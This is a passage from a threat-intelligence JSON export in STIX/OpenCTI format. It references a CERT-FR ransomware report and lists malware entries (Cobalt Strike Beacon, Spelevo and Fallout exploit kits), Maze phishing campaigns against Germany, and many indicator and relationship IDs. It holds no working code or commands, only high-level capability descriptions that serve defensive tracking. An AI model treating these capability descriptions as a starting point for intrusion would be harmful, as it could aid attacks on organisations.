LTFhYzE4NzM1NzZhMyI6eyJwb3NpdGlvbiI6eyJ4Ijo2MTc3LjUsInkiOjQ4MH19LCI1YjI1NGQ3ZC0zNzI0LTRkYTktODA0OC00OWY0ZTNiYWQ5ZjIiOnsicG9zaXRpb24iOnsieCI6ODI4Ny41LCJ5IjoxMTB9fSwiOGZiYjU5MjAtMGVjNS00ZWNjLTk2MjktMjg1MGYxZjUyOGE4Ijp7InBvc2l0aW9uIjp7IngiOjgxNjcuNSwieSI6MTEwfX0sImI4ZGM1MTJkLTdkNTktNDFiMC1iNGYwLWQ2ZGJkZjI4ZTRjZCI6eyJwb3NpdGlvbiI6eyJ4Ijo3Njk3LjUsInkiOjQ4MH19LCI5YjljZWU4Ny1kODE3LTRmNDItYTg3Ny0xYWUwODNkNTU0MDgiOnsicG9zaXRpb24iOnsieCI6MjI3MCwieSI6MTEwfX0sImQyNjcxMjE3LWNkNjMtNGZhYi1hZTVkLThmNDI0ZTA3Y2UzZiI6eyJwb3NpdGlvbiI6eyJ4IjoxMzYwLCJ5Ijo0ODB9fSwiOWI2MTM1MmQtZDIyZS00MDYyLThjYWYtOWZiNjkyNDVjMGQ2Ijp7InBvc2l0aW9uIjp7IngiOjQyOTIuNSwieSI6NjY1fX0sImEyZTljYjQ5LWZmMzctNGJmYy04ODQzLTA4ZTZmZGYxYmZjNSI6eyJwb3NpdGlvbiI6eyJ4Ijo3NDU3LjUsInkiOjQ4MH19LCJkNTMwNTMzOC1kN2ZkLTQ2OWItOWU0OC1hNzM3MDZlZDJmMWIiOnsicG9zaXRpb24iOnsieCI6NzI5Mi41LCJ5Ijo0ODB9fSwiN2FmYjEwNjItZDJiNy00MTQ2LTgyODUtYzk4OWIwNTIxY2Q3Ijp7InBvc2l0aW9uIjp7IngiOjYyOTcuNSwieSI6NDgwfX0sImFjZWM0Y2M0LTdmM2YtNDlkZC1hOGJmLWQ0YzBkODI2ODhkYSI6eyJwb3NpdGlvbiI6eyJ4IjozMjI3LjUsInkiOjY2NX19LCJkMTZiNDNiNi1hMjE3LTRhMTgtODRhNC0zMjhhY2Y3NmYzZTIiOnsicG9zaXRpb24iOnsieCI6MjgxNy41LCJ5Ijo0ODB9fSwiMmQ2NjA3MDMtNzc4Yi00YzU1LTk5YWMtNjM5OTVhZGMyNDEwIjp7InBvc2l0aW9uIjp7IngiOjQxNzIuNSwieSI6NjY1fX0sIjM4NjVhMTFiLWY2ZTgtNGNlZS1hZGM2LTY5YzZlZjExNmNkMCI6eyJwb3NpdGlvbiI6eyJ4Ijo1MzM3LjUsInkiOjQ4MH19LCJlYzNkMjRjOC0yN2UxLTRjNzYtOWE4Mi05Mzc3YmE4NTY2YjMiOnsicG9zaXRpb24iOnsieCI6ODA0Ny41LCJ5IjoxMTB9fSwiYzRiMTk4NGYtNzQwYi00OGUyLWE3ZDYtMGU0NDRjNmE4OWFmIjp7InBvc2l0aW9uIjp7IngiOjQzMCwieSI6MTEwfX0sImM0OTExNTc2LWVjNGEtNDllMC1iNzYxLTE0OGFiMDgxYWRhNSI6eyJwb3NpdGlvbiI6eyJ4IjoxMjkwLCJ5IjoxMTB9fSwiMjllYWFkMzgtMjczMi00ZDdjLTkzYzgtMjBlMjkxMDM2YmZjIjp7InBvc2l0aW9uIjp7IngiOjM1NDIuNSwieSI6MTEwfX0sIjZiM2E3OGQxLTliZTQtNDhlMC05YzAyLTE4NGJjMjYzNTdlOSI6eyJwb3NpdGlvbiI6eyJ4Ijo5MzAsInkiOjQ4MH19LCJkNzQ1ZjAwOC02YmM0LTRkYWUtOTliYi1jZWFiYWU0OTA4Y2EiOnsicG9zaXRpb24iOnsieCI6NDQ5Ny41LCJ5Ijo0ODB9fSwiZTgxZGQ0NWItOWM3My00Nzk1LThmZTYtMjkxZDQ2NjJhMmMwIjp7InBvc2l0aW9uIjp7IngiOjc5MjcuNSwieSI6MTEwfX0sIjVmZmI1ODE2LWFhODItNGUwZi04NWQ0LTAwOWI2N2I5Y2U1OCI6eyJwb3NpdGlvbiI6eyJ4Ijo2MDU3LjUsInkiOjQ4MH19LCJiNzNmMGIxNS0yOGY1LTRkZWYtYTIyYi00MmQ0YmY1ZDNmYWYiOnsicG9zaXRpb24iOnsieCI6NzgwNy41LCJ5IjoxMTB9fSwiZjQ2ZDY3NDItNzg3Ny00YzQ3LTg4MGUtODg5NjMxZGM5M2Y5Ijp7InBvc2l0aW9uIjp7IngiOjc2ODcuNSwieSI6MTEwfX0sImYxNjhhZmZkLWQwZjMtNDE4Ny04MDcxLTVjMzBlMzlmNGZiMCI6eyJwb3NpdGlvbiI6eyJ4Ijo3NTY3LjUsInkiOjExMH19LCI3ZDZhMTI3MC1iZTRjLTRiYjEtOGRhYS0zMjcyNjkxNzMxNWMiOnsicG9zaXRpb24iOnsieCI6NzU3Ny41LCJ5Ijo0ODB9fSwiOTI4OTgxYTQtNjg3My00MTgxLWEwYWEtNzA4MzM1YjUwZTgxIjp7InBvc2l0aW9uIjp7IngiOjIxNTAsInkiOjExMH19LCIzZDFkZWVhYy1iYjI2LTQ0MWEtODQ4NC02ZGZjY2Y5MzY3YjkiOnsicG9zaXRpb24iOnsieCI6MzEwLCJ5IjoxMTB9fSwiNzFmMjlmYTktZGI4NC00OTg5LWJiMDAtOGM1ZThhZWVkZTkyIjp7InBvc2l0aW9uIjp7IngiOjIwMzAsInkiOjExMH19LCI3NmFjNDVmZC00MzYwLTQwZTEtOWY5Mi0yNGQyOTlkNjY0OWMiOnsicG9zaXRpb24iOnsieCI6MTE3MCwieSI6MTEwfX0sImY5MTY5NmJmLTE4NGItNGE3OS05ZGZiLWNhNjg2Mjk1YjExNiI6eyJwb3NpdGlvbiI6eyJ4IjozNDIyLjUsInkiOjExMH19LCJjYzBlYWNmYS1jZDBiLTQ3MWYtODVmZC00MTgxOGJlODFiMTgiOnsicG9zaXRpb24iOnsieCI6Mjg0Ny41LCJ5Ijo2NjV9fSwiNmRjMTkzOGUtYjQ0Ny00NzZmLWJjZjUtNDM5NmRkNjQ3N2QxIjp7InBvc2l0aW9uIjp7IngiOjU2MCwieSI6NDgwfX0sIjNkZmMwZTI0LTgwYTctNDM4Mi1hMjhjLWY3YmY5ZDMxYmRiMiI6eyJwb3NpdGlvbiI6eyJ4IjoxOTAsInkiOjY2NX19LCI1Nzc1MGRkNC1iYWNkLTQxZDEtOThlMS1lYTRkMGE4NzVhNWYiOnsicG9zaXRpb24iOnsieCI6MzM1Mi41LCJ5IjoyOTV9fSwiNDQ1ZDRmYTktNmI1NC00M2QyLTlmYzUtNjhiYWU5YzcyZmVhIjp7InBvc2l0aW9uIjp7IngiOjM0MjIuNSwieSI6NDgwfX0sIjQwY2U1MjJiLTgyNmUtNGY0My1hYjFjLWQ4YjIwNzM1NjU0NiI6eyJwb3NpdGlvbiI6eyJ4IjozMjkyLjUsInkiOjQ4MH19LCJkNTUzZWMwMS1hNTNkLTQyZTMtYmMwNC0zYzQxNTU1OWUzZDQiOnsicG9zaXRpb24iOnsieCI6MjcyNy41LCJ5Ijo2NjV9fSwiNmJiMjc1MmMtYjU5NC00OGExLThjZDQtNmFhYmUyODcwM2ZmIjp7InBvc2l0aW9uIjp7IngiOjI4ODcuNSwieSI6Mjk1fX0sIjY3YTUzNzkzLTU2OGUtNDFhMy05ZTRmLTY0M2ZkNjg0OGVjYyI6eyJwb3NpdGlvbiI6eyJ4IjozODEyLjUsInkiOjY2NX19LCJiMzI3ZTk3OS03OGE1LTQyYzUtOGQ4ZS1kZGJlZGJlNjAwODciOnsicG9zaXRpb24iOnsieCI6NDg1Ny41LCJ5Ijo0ODB9fSwiZTkzNzk3NTAtNzVkOS00ZmFiLThhNGItMDQzYjcyY2JjMThlIjp7InBvc2l0aW9uIjp7IngiOjQwNTIuNSwieSI6NjY1fX0sIjQ0NGQ2ZjYxLWY3YzctNDdhMi05YzIzLTU0M2JlYTM0YTkwNiI6eyJwb3NpdGlvbiI6eyJ4IjozNDY3LjUsInkiOjY2NX19LCI0Y2NmZjM2NC05NmMzLTQyOGMtOWUwYy04ZTk3ZjMwODE5ZDkiOnsicG9zaXRpb24iOnsieCI6NzYzNy41LCJ5IjoyOTV9fSwiZGYyNDdjOTItZjlmYi00YzE4LTlmMDAtMDliZDUyNWE3NTI3Ijp7InBvc2l0aW9uIjp7IngiOjc0NDcuNSwieSI6MTEwfX0sIjk5Njk2MGIzLTM4MTYtNGM2ZS05MjA3LTU2NDExOGFjMGY0MiI6eyJwb3NpdGlvbiI6eyJ4Ijo3MzI3LjUsInkiOjExMH19LCI3MjU5NjQxZi0zNjJlLTQyYzItOGZjMS1lNzkyOTgyZmYyNjIiOnsicG9zaXRpb24iOnsieCI6NTA5Ny41LCJ5Ijo0ODB9fSwiZDZhNTI3NzUtM2NjOS00MTBkLWExMWYtMGYyYmFiNjQ0YzJlIjp7InBvc2l0aW9uIjp7IngiOjcyMDcuNSwieSI6MTEwfX0sImZmNTU2NTYyLTBiZDktNGZmOC1hOTcwLWU1OGFhMTFiZjM1ZCI6eyJwb3NpdGlvbiI6eyJ4Ijo3MDg3LjUsInkiOjExMH19LCJiNzg4ZjM5NS0xMTU4LTRiOTktYWQ1ZC03NDQyNjAzOTA3YWQiOnsicG9zaXRpb24iOnsieCI6Njk2Ny41LCJ5IjoxMTB9fSwiNDFkNDQwMDYtZjM5ZC00YWJlLTk0ZjgtNjA5YWE0MTIyNjFhIjp7InBvc2l0aW9uIjp7IngiOjY4NDcuNSwieSI6MTEwfX0sImVkZGI3ZjM3LTgzZWEtNDMwNi1iZjExLWE5MGZjMDIzZmZjZCI6eyJwb3NpdGlvbiI6eyJ4IjoyODE3LjUsInkiOjExMH19LCJhNDNjZjQyMy00NDFmLTQ4ZjMtOGM1Ni02YzljNTVkMmY1YjkiOnsicG9zaXRpb24iOnsieCI6MTkwLCJ5IjoxMTB9fSwiNDZjMDM0ZDMtOWQyMC00NDc4LWFjYjItOWY3MmRjZDQzMzIxIjp7InBvc2l0aW9uIjp7IngiOjcwLCJ5IjoxMTB9fSwiZjUxNmZjMTAtMGMwYS00YmY2LTlhYzktY2RiMGM2ZGRlOGQ1Ijp7InBvc2l0aW9uIjp7IngiOjE5MTAsInkiOjExMH19LCI2NDNkYjliNC03OTNlLTQ4NzMtYTM1NS04YmU5NTc5NTRiMGUiOnsicG9zaXRpb24iOnsieCI6MjY5Ny41LCJ5IjoxMTB9fSwiZmQxZDcyYzktOGI3Yy00ZDU3LWFmYmEtNmNjMTNkNmU5MTE3Ijp7InBvc2l0aW9uIjp7IngiOjAsInkiOjQ4MH19LCI5NWExY2I4MS1jZGQzLTRiNzktOWY2ZC00ODA2NzE4MjY5NWIiOnsicG9zaXRpb24iOnsieCI6ODEwLCJ5IjoxMTB9fSwiNjI5NDU5YzYtYzUxYi00MTIwLWFlNDQtNWZiYWNlZTIyOTEzIjp7InBvc2l0aW9uIjp7IngiOjM1NDIuNSwieSI6NDgwfX0sImUwMjlhZWFjLTg4ODAtNGE1OC1iYjg2LTViNGVkMjE3YTVkYiI6eyJwb3NpdGlvbiI6eyJ4IjoyNjA3LjUsInkiOjY2NX19LCIyZWIzYzVhMi1hMGQyLTQ1NDAtODEwNy1iNjFjOTBlMGRkMmUiOnsicG9zaXRpb24iOnsieCI6NjQ1LCJ5Ijo2NjV9fSwiNWI2ODZmMTUtN2Q1NC00M2Y4LThiMGEtOWIxMjgxYjMyNjljIjp7InBvc2l0aW9uIjp7IngiOjQzNzcuNSwieSI6NDgwfX0sIjdiMTIzZDMwLWIzZDYtNDlkMy1hZTNkLThmMmQ4MWVkMzc5NSI6eyJwb3NpdGlvbiI6eyJ4Ijo0NzM3LjUsInkiOjQ4MH19LCIwNjIxYzJlNS1kY2UyLTRhYTItOGE2ZS1lOGQ1ZjVkM2MwNjMiOnsicG9zaXRpb24iOnsieCI6NzM1Mi41LCJ5IjoyOTV9fSwiNGE2MTQ0YTEtMjQ0NS00MmZkLWE2ZWUtOGQxNWU4ODlmOTZkIjp7InBvc2l0aW9uIjp7IngiOjU0NTcuNSwieSI6NDgwfX0sImYzYjNlNWQ2LTk1MjctNDZiNS04OGFmLTRiODA0NzE0MGIxYyI6eyJwb3NpdGlvbiI6eyJ4Ijo1OTM3LjUsInkiOjQ4MH19LCI2YmIyYzYzNC0xNjFkLTQ2NjAtOGMwYi00YTI0ODViY2M4OTkiOnsicG9zaXRpb24iOnsieCI6NjcyNy41LCJ5IjoxMTB9fX0sInpvb20iOjE1LjQwNzA3MzcwOTU2ODU3OSwib2Zmc2V0WCI6LTM0LjM5MDMzNTc4NTE0NTE1LCJvZmZzZXRZIjoxNTAuNDYwNjk4NjE4MTI1ODZ9",
"x_opencti_id": "d999f711-aec1-4d1a-9579-2164e3468cb7",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"external_references": [
{
"id": "external-reference--bef3cce5-799d-4d16-ba41-94a6ce5cf84f",
"source_name": "CERT-FR",
"description": "Etat de la menace rançongiciel à l'encontre des entreprises et des institutions",
"url": "https://cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-001",
"external_id": "CERTFR-2020-CTI-001",
"x_opencti_id": "3d3d7150-8feb-49d2-83aa-e6ea747930f3",
"x_opencti_created": "2020-02-04T14:16:03.396Z",
"x_opencti_modified": "2020-02-04T14:16:03.396Z"
}
],
"object_refs": [
"malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"malware--c6006dd5-31ca-45c2-8ae0-4e428e712f88",
"malware--b03a728b-69c3-4734-a50e-94517938c419",
"campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"incident--82f427aa-7622-438f-9172-980fe432359c",
"incident--4707c654-4876-4897-9a3a-eae84858e199",
"incident--b0c526ac-b80a-4e61-87bf-85f0826923b3",
"campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"incident--ed46cbe3-506f-47ae-9ab8-94f22edd699a",
"incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"incident--ec987884-bbe1-4407-93aa-8225d2b1feae",
"incident--c8f661b6-967f-40f5-9f3d-d51a9b2fbee7",
"campaign--2f94c044-1f99-4ecd-b3e4-2ac55aa8752d",
"incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"indicator--acc94099-0037-405e-9763-69fd0c2f1839",
"indicator--8895042c-7c13-4d86-a4de-6e8b560a0519",
"indicator--5b4eca1f-a30c-420c-845a-4f089934dcf2",
"indicator--783d7b92-5209-4bd5-844b-d594b6efda1c",
"indicator--94b5c744-b156-4208-ab8d-e28e1ec56eb9",
"indicator--6cf4aa42-fe72-4cb8-a91d-c54b09533a8d",
"indicator--48e335bc-734e-4bcb-b364-f24407be5ece",
"indicator--ab041af1-0ba0-4c62-b020-fcb43c0c42dc",
"indicator--2deec89a-2cf2-47b8-9fae-89a456d834d5",
"indicator--3a0ab761-cca4-4aec-b127-b103d978b7ed",
"indicator--dc5ead57-a56d-4a7c-b477-bf33c5828615",
"indicator--6e479260-bd34-45c4-802f-a236533127f0",
"indicator--8477d190-01fa-42d0-8c25-c6cb7b62e42a",
"indicator--07caf8e2-b8d1-43f3-a3f8-226ac17e604b",
"indicator--699fa50b-7154-4581-b5c4-cd62d8c04a7d",
"indicator--d0fe5c47-c5e9-4bbe-bc4f-937ebd16fcac",
"indicator--af485c23-5498-400b-ba25-e05a9a3a0198",
"indicator--614df552-e5e7-44b1-b473-22efdf5a1546",
"indicator--2442e818-ac39-4876-aaa0-bf0019f4b27b",
"indicator--f6ab57d7-06b3-4980-b6d0-8a4364eb5dd4",
"indicator--dcaa1087-87d2-410a-83aa-90c936afe3e4",
"indicator--4eef17b7-4ba6-46bc-8ed7-1a29826cf7b2",
"indicator--4a642ed5-f664-410a-b9b9-e7f0ab65bd18",
"indicator--7ca5ea6e-34a9-40cc-a4d8-61095f05777f",
"malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"indicator--4d3eb24a-9f23-48a8-9282-ec2987012725",
"indicator--da8c1488-3d95-44b6-9f56-03f9ab80a697",
"indicator--d7519fd7-a6f1-4c05-86b6-39397c61c5b5",
"indicator--2e21736d-afe6-410e-8e99-7eb93c0089fa",
"indicator--ebfc934d-56bf-4eb9-be0c-fdadb647afae",
"indicator--f20433f5-12e8-4cda-b752-630ca2d16852",
"indicator--69fdb470-d38d-405e-9ee3-364461504cf1",
"indicator--05024cf6-871c-4274-bc86-103dce87bab7",
"indicator--4f6cfd26-3328-40e5-90f7-e05d94fde810",
"indicator--f732504e-0cc0-4dce-b7e5-efab624f300c",
"indicator--cd96e384-82b5-409f-8984-afc26a55e1c0",
"indicator--8751d70a-582a-4cff-a1b6-a87717386606",
"indicator--20d5c6ac-ef7d-4cac-a941-104719daf80d",
"indicator--16c3d153-3516-4637-aba4-cccf05121fcd",
"attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"attack-patern--c8bd35e8-f4ad-4001-8440-51b91d37d947",
"attack-patern--d3828e37-fb36-4bbd-83be-1eacacaaec9e",
"identity--9dc270f2-416f-40aa-865a-cbf6e87a04a9",
"organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"organization--c017f212-546b-4f21-999d-97d3dc558f7b",
"identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"organization--0e5ef1d2-d80b-489c-a10b-58cf7ab8eee0",
"identity--433d071c-42e4-41fa-915e-bad5a7473bd1",
"organization--c5969189-dcf6-4106-af6e-3a63118f20d9",
"organization--26cdeaa6-f435-4857-b631-27c247cd041d",
"organization--5b705ce2-ff85-4cc7-8264-63fdccf6fc92",
"identity--65463837-a41a-4b61-a074-b2f20f097555",
"organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"identity--fb102c71-bf02-42a0-82aa-bed03df3afb0",
"organization--f6700d44-b1db-4065-ba64-ed02034a7cd6",
"identity--f0e37b7a-93e9-4884-ac16-84cbcc1f0a2f",
"identity--700b77c4-6eb1-40b0-98c8-14d454638a9f",
"identity--23c518a8-e30c-4813-bcef-4001cd834929",
"identity--d2d2f930-4f0e-409b-9565-899ba3aba6af",
"identity--040b3a47-41a6-44d0-91f9-08614ba67364",
"identity--f4c6843f-ed38-46e0-9e95-35c781f935b1",
"identity--5723cafe-2ef6-401c-a50b-0f0b754edb49",
"identity--0700254d-cc41-4655-8e9e-f2b7ef9e38f6",
"identity--bb0a97dc-ae81-4c5e-9b56-3add2a980977",
"threat-actor--695dcd8f-53c8-45f6-b55a-3ae093d87f69",
"threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"relationship--19723a17-c942-4231-96f7-73db1c0d373b",
"relationship--940e927a-c350-495c-a612-96e91487c228",
"relationship--c9f8f9a4-024d-4c09-befd-d136554c1e04",
"relationship--aaa6aa7d-b035-4d85-bedc-be3091883fff",
"relationship--efa9ef88-96e7-43ed-95ce-52c2d23b617d",
"relationship--5df6632a-63b8-4e12-befc-32f74cf0c0bc",
"relationship--ce6959d6-e046-4bf7-96c7-1fd974c5ee8b",
"relationship--f89b7a83-518c-4711-b1a1-3b4632f6e91c",
"relationship--f4e9424b-417e-486b-81f3-e411f3fe779f",
"relationship--bd07e2f9-0e97-469d-825c-14f68d77c55f",
"relationship--3dcf9dd6-93c4-48ab-9828-b8bf7246b666",
"relationship--1630916b-cfe9-4f25-b96f-8694d5aa2bfa",
"relationship--02611de8-57da-42c4-a07f-b34b35ee599c",
"relationship--fad9e08f-fa22-4e36-9eec-1d3e099a99be",
"relationship--288794bd-993d-452b-b4ef-8e2c0239e772",
"relationship--ba8e9eeb-0e52-4e91-a5cc-6a1782d0056c",
"relationship--b57a8b86-24ef-433a-b7c7-c262e4345961",
"relationship--b2f5fb87-7e50-484f-8232-9f65c10b0058",
"relationship--d9fbecb8-530b-400d-a0f1-be1821f62e7e",
"relationship--e0ee6084-d4e6-4d01-9eb5-50ef1b975b79",
"relationship--9bdc2b8e-c0c7-4a19-bf1f-1859d0e6a7c3",
"relationship--0246b8d2-73ea-48fd-a888-b2afce788f1a",
"relationship--ce8eab1f-1c4d-4c3c-9cbd-1dc6ea25d566",
"relationship--33799534-2e54-4b00-bbf6-32be6359f7a6",
"relationship--4e67bf72-02fc-4f09-808c-550c6112f3f0",
"relationship--560ff6cf-b17e-4672-9e9f-64527f411396",
"relationship--2de7b0c0-65d2-4c33-ad51-6de4d96e8c82",
"relationship--a842a8f3-1a46-4c2f-86c6-0730f826123b",
"relationship--50550e47-fedd-4360-9e33-f76af5be17ac",
"relationship--df0e4c16-3729-4704-86d5-5aa4ae9f151a",
"relationship--2dcab7ee-67a3-4d56-9eb0-ccea4ca67591",
"relationship--553397d5-0d5c-4d77-a679-9013acf11eb1",
"relationship--7f190cdd-4c24-4197-8e19-de7a43cb4d69",
"relationship--5b0a8c1c-6265-42f3-84f0-e486dc3af97c",
"relationship--01ec830f-d69f-4ec7-8b31-df27320c60ca",
"relationship--5bb1db7e-66f7-4edc-bb45-f862d47299a3",
"relationship--6239433a-7b9a-478f-9e4e-4c7ced862958",
"relationship--508b19b9-30a8-44ac-b2d5-b010fdd30dbd",
"relationship--bcfa95a6-9978-4477-95f4-666308e2f316",
"relationship--36de8086-e0b8-4857-959b-223a5e4d70ff",
"relationship--98657e57-423b-4d22-918f-f7e6c0bace20",
"relationship--f6457544-4232-492a-9900-fdc16e2120ba",
"relationship--40934950-668c-4222-af9d-86861a673d64",
"relationship--63e10ccf-fcc5-420a-85e3-0ba606e424df",
"relationship--c3b77fd7-ca97-49cd-a456-55a84e5dbfb0",
"relationship--dee7e50e-824d-454a-93e2-034aa7234977",
"relationship--163d2fe5-2f5d-4b90-9c8e-2938d27e6ed8",
"relationship--fe3b22f8-caf6-4297-addd-8ead11501140",
"relationship--00d6f9a5-ba28-4c36-aa96-6a895c0f59d3",
"relationship--f194dfc2-1bb0-4aab-9200-87071915f98e",
"relationship--a79bd633-8557-4c5b-8381-24ea5795b0d1",
"relationship--a79dd61a-17db-4744-92d3-04f51f2d0337",
"relationship--3ccd9fb3-48d9-47b8-bb1d-f3abff658a7d",
"relationship--d8e74e08-bb66-4fd5-b3cd-5c79c397bf0d",
"relationship--75f5674b-2500-475a-aa55-6f77fa6ab9f7",
"relationship--c093a59f-7770-4ab1-8ea9-d2a1b6d8494f",
"relationship--d345dfdc-78d4-4473-b960-246c87a2698b",
"relationship--33e0e467-ed31-42f7-8939-1b07cd379eef",
"relationship--6823218c-aa3c-4d09-965f-17725774d37b",
"relationship--3fc721da-63c0-4366-b3fb-44fca7aa4e59",
"relationship--10f038ce-870a-4203-a972-661a383cbd06",
"relationship--0d4b8802-e9ab-4a81-9b4f-6893e8c72165",
"relationship--f86b3029-477d-456c-b69e-7f957e9a0ecc",
"relationship--f830e01a-1d45-42fc-86bc-49bde9def60b",
"relationship--e6676409-e7ad-4100-91df-175868b93131",
"relationship--c424d6d1-2338-4ce5-bf3b-e3c15494eb23",
"relationship--7b58b77e-b69d-462e-8a48-a37403ab6e66",
"relationship--35bb7efc-ff99-4ae2-8edf-609306dcdd38",
"relationship--384e4106-3db3-441f-aa4b-36205f49d2c8",
"relationship--8660671e-4e14-42a9-9582-c9b933e40367",
"relationship--4900c69b-95cb-4eac-a012-aa0cc971d523",
"relationship--335444b8-a1df-4cb1-a1ce-f15377655a8a",
"relationship--0a1f226a-697d-4625-a2e9-a540d5a93243",
"relationship--dcd2b964-691c-4d25-ae7b-602bd3bfb10d",
"relationship--db73ac7d-4992-4e24-a7dc-b8ca7e6a1dfa",
"relationship--7a40d101-a198-4ad0-8e28-7b1964e2a58e",
"relationship--7e86b9d0-9584-435f-98f7-3a59cedb3f81",
"relationship--ca24ea86-2325-469b-9031-a56075c124ac",
"relationship--c4512510-c528-42ae-9345-438f0fd04e6d",
"relationship--9a581b08-5371-4d0c-8ca1-a933c60b2030",
"relationship--eb7acec0-1510-479e-abca-00056fd56e83",
"relationship--c0e4a44a-3b9f-4560-905a-636f2f6a8070",
"relationship--f33f5d02-6467-49e0-9b10-95c55ef106b1",
"relationship--d214bad4-8ae3-490b-83d9-00a8d0f6c7a1",
"relationship--5400ff3b-0487-4455-a772-9097ae7751c3",
"relationship--d0ab3ef9-3303-4e00-b050-2a1fad8fdf53",
"relationship--907cfddb-6c6e-4eb1-8c56-1596c1ecf9bc",
"relationship--6cb972c9-84c3-4a01-8814-9ce23e386bc6",
"relationship--217bfd74-4f42-483a-8e63-bb86f7566eed",
"relationship--fa57e1ab-092d-44a4-90a4-bea3641bd96e",
"relationship--f805adbe-2c0b-4c13-a375-562b7ba8b625",
"relationship--7de932be-bdd3-4c2a-8fa3-239e6a1b43dc",
"relationship--5ccd07e8-781d-43c0-8448-0d6a18617554",
"relationship--8685ab4e-e44b-42f8-9f0a-0ce0b69ca115",
"relationship--f43ffd59-c8c6-4271-a322-c78ffb83555b",
"relationship--6227f6bc-1caf-47fb-8c66-21135550ed76",
"relationship--87236979-65e4-445e-bd16-186f2081bc2c",
"relationship--dd384fe8-e2f4-49c8-a0f5-f56571f4413d",
"relationship--bfc58ac1-0388-483b-b9c7-6c3695adfc0e",
"relationship--dff57daf-f597-4a66-a9bb-ad6487f1bb66",
"relationship--4332e775-2fbf-4c61-9513-a24d554d6099",
"relationship--ec3deac6-a9df-4987-947c-b6ec35871d3e",
"relationship--2c3bb531-75e8-4337-9f21-e181956ed8ca",
"relationship--cd3b1416-3550-4c03-84c9-deeebe1bf6e3",
"relationship--4b5067b7-c297-4ad7-a4c4-5ddeab47996d",
"relationship--927f8898-69f6-4815-a389-b92be0920466",
"relationship--b26692b6-492a-4975-a48c-0532813f3bd7",
"relationship--aac9bb6c-e142-4caf-a1a3-67c627bbc04a",
"relationship--16d0e325-54d2-485d-86b0-0b041661ec95",
"relationship--0838f4ff-c6ed-4aac-9401-4dfb3bfc7bc6",
"relationship--7278efc9-d16f-4f1e-9902-c44eac1ddfc6",
"relationship--58a80e8b-9ae2-4c52-80dd-85d77ceaa1df",
"relationship--7b15dda1-f16b-4853-b09c-82929f243c0f",
"relationship--704cfd8c-f9b9-41a7-9816-4fa48a222fef",
"relationship--023e9621-78d7-48ac-a9aa-fe54b55b1271",
"relationship--528c12c0-42ae-4c68-bbd5-733b34510517",
"relationship--93d3d709-0d95-4465-834b-4704ad1665f8",
"relationship--ef64aac0-ae6b-4660-b7f9-44d8ceb81c1c",
"relationship--7ae37c11-aa56-4155-99c6-72e0aecff7ea",
"relationship--958d972f-186c-4bc0-b1b4-453c0d4dc8b1",
"relationship--22bc2200-846f-4552-ad7f-8993489eabfe",
"relationship--e834fc63-5daf-468e-bf2d-4cfc1c15c745",
"relationship--33e2068b-067d-480c-be0e-4f2e71645f85",
"relationship--4819490a-9414-4b8d-8208-87dc2a33f584",
"relationship--14e23cd7-1a6d-422e-b1a6-61cb53e01215"
]
},
{
"id": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"type": "malware",
"name": "Beacon",
"labels": [
"malware"
],
"description": "Backdoor that is commercially available as part of the\nCobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.",
"created": "2019-09-30T16:38:26.000Z",
"modified": "2020-01-14T14:01:48.288Z",
"x_opencti_id": "14db3816-53db-4811-ba6e-586426ae59b8",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "malware--c6006dd5-31ca-45c2-8ae0-4e428e712f88",
"type": "malware",
"name": "Spelevo EK",
"labels": [
"malware"
],
"description": "Exploit Kit",
"created": "2020-02-04T14:48:31.601Z",
"modified": "2020-02-04T14:48:31.601Z",
"x_opencti_id": "6fb84f02-f095-430e-87a0-394d41955eee",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "malware--b03a728b-69c3-4734-a50e-94517938c419",
"type": "malware",
"name": "Fallout EK",
"labels": [
"malware"
],
"description": "Famous Exploit Kit.",
"created": "2019-09-12T10:09:57.000Z",
"modified": "2019-09-12T10:09:57.000Z",
"x_opencti_id": "947af535-64e2-4c0d-8b60-980d2633c014"
},
{
"id": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"type": "campaign",
"name": "Germany - Maze - October 2019",
"labels": [
"campaign"
],
"description": "Proofpoint researchers observed hundreds of emails attempting to deliver malicious Microsoft Word attachments with German lures impersonating the\nBundeszentralamt fur Steuern, the German Federal Ministry of Finance. Of particular note is the use of stolen branding as well as the use of lookalike .icu domains used for the sender email address in order to craft effective lures.",
"created": "2020-01-07T14:25:02.649Z",
"modified": "2020-01-07T14:26:58.737Z",
"x_opencti_id": "867d03f4-be73-44f6-82d9-7d7b14df55d7",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"type": "campaign",
"name": "Germany - Maze - November 2019",
"labels": [
"campaign"
],
